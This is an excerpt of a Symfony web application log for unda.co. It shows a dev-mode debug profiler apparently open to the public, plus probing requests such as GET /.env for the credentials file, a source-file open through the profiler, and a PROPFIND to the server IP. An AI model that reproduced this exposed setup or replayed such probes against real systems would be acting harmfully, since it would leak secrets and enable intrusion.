  6279. [2025-12-20 01:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6280. [2025-12-20 01:37:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6281. [2025-12-20 01:41:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=dump","method":"GET"} []
  6282. [2025-12-20 01:41:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  6283. [2025-12-20 01:49:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6284. [2025-12-20 01:57:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  6285. [2025-12-20 01:58:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6286. [2025-12-20 01:59:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"bbdda8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/bbdda8/search/results?limit=10&method=GET","method":"GET"} []
  6287. [2025-12-20 01:59:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  6288. [2025-12-20 02:02:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6fb1d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6fb1d","method":"GET"} []
  6289. [2025-12-20 02:02:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6290. [2025-12-20 02:03:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6291. [2025-12-20 02:03:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
  6292. [2025-12-20 02:03:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
  6293. [2025-12-20 02:05:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"081dae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/081dae","method":"GET"} []
  6294. [2025-12-20 02:05:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6295. [2025-12-20 02:07:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=exception","method":"GET"} []
  6296. [2025-12-20 02:07:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  6297. [2025-12-20 02:11:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"acf638","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/acf638?panel=time","method":"GET"} []
  6298. [2025-12-20 02:11:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6299. [2025-12-20 02:12:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6300. [2025-12-20 02:12:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=config","method":"GET"} []
  6301. [2025-12-20 02:12:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6302. [2025-12-20 02:20:42] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6303. [2025-12-20 02:27:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6304. [2025-12-20 02:29:00] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  6305. [2025-12-20 02:29:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6306. [2025-12-20 02:29:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6307. [2025-12-20 02:29:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6308. [2025-12-20 02:29:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6309. [2025-12-20 02:29:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6310. [2025-12-20 02:29:00] security.DEBUG: Calling Authentication entry point. [] []
  6311. [2025-12-20 02:29:00] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  6312. [2025-12-20 02:30:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6313. [2025-12-20 02:30:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  6314. [2025-12-20 02:30:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
  6315. [2025-12-20 02:30:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6316. [2025-12-20 02:31:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"afab25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/afab25?panel=twig","method":"GET"} []
  6317. [2025-12-20 02:31:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6318. [2025-12-20 02:31:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=78.153.140.188&limit=10&method=GET","method":"GET"} []
  6319. [2025-12-20 02:31:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=78.153.140.188&limit=10&method=GET","method":"GET"} []
  6320. [2025-12-20 02:32:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
  6321. [2025-12-20 02:32:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6322. [2025-12-20 02:35:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6323. [2025-12-20 02:35:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6324. [2025-12-20 02:41:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f6e8b1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/f6e8b1/search/results?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  6325. [2025-12-20 02:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  6326. [2025-12-20 02:42:25] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://www.unda.co/_profiler/open?file=src%2FHona%2FApiBundle%2FController%2FResidentialController.php&line=30","method":"GET"} []
  6327. [2025-12-20 02:42:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8f04fd","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/8f04fd?panel=time","method":"GET"} []
  6328. [2025-12-20 02:42:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6329. [2025-12-20 02:52:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
  6330. [2025-12-20 02:52:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
  6331. [2025-12-20 02:53:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=form","method":"GET"} []
  6332. [2025-12-20 02:53:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  6333. [2025-12-20 02:53:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6334. [2025-12-20 02:56:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6335. [2025-12-20 02:57:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6336. [2025-12-20 02:57:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  6337. [2025-12-20 03:01:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=security","method":"GET"} []
  6338. [2025-12-20 03:01:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6339. [2025-12-20 03:04:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=time","method":"GET"} []
  6340. [2025-12-20 03:04:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6341. [2025-12-20 03:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"631d61","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/631d61?panel=twig","method":"GET"} []
  6342. [2025-12-20 03:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6343. [2025-12-20 03:19:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec0d0f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/ec0d0f?panel=time","method":"GET"} []
  6344. [2025-12-20 03:19:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6345. [2025-12-20 03:19:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=validator","method":"GET"} []
  6346. [2025-12-20 03:19:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  6347. [2025-12-20 03:20:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=82.180.146.199&limit=10","method":"GET"} []
  6348. [2025-12-20 03:20:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=82.180.146.199&limit=10","method":"GET"} []
  6349. [2025-12-20 03:20:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=router","method":"GET"} []
  6350. [2025-12-20 03:20:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  6351. [2025-12-20 03:31:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d2531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3d2531","method":"GET"} []
  6352. [2025-12-20 03:31:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6353. [2025-12-20 03:37:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=request","method":"GET"} []
  6354. [2025-12-20 03:37:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6355. [2025-12-20 03:38:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323","method":"GET"} []
  6356. [2025-12-20 03:38:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6357. [2025-12-20 03:39:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b8d5e3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b8d5e3","method":"GET"} []
  6358. [2025-12-20 03:39:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6359. [2025-12-20 03:41:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6360. [2025-12-20 03:41:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=twig","method":"GET"} []
  6361. [2025-12-20 03:41:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6362. [2025-12-20 03:43:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17","method":"GET"} []
  6363. [2025-12-20 03:43:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6364. [2025-12-20 03:48:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d8ebc6","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/d8ebc6","method":"GET"} []
  6365. [2025-12-20 03:48:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  6366. [2025-12-20 03:49:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6367. [2025-12-20 03:57:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=router","method":"GET"} []
  6368. [2025-12-20 03:57:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  6369. [2025-12-20 03:57:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"5f0320","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/5f0320/router","method":"GET"} []
  6370. [2025-12-20 04:03:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  6371. [2025-12-20 04:03:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  6372. [2025-12-20 04:06:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d349d2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d349d2?panel=db","method":"GET"} []
  6373. [2025-12-20 04:06:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6374. [2025-12-20 04:11:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"88655c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/88655c/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  6375. [2025-12-20 04:11:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  6376. [2025-12-20 04:12:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=db","method":"GET"} []
  6377. [2025-12-20 04:12:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6378. [2025-12-20 04:14:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
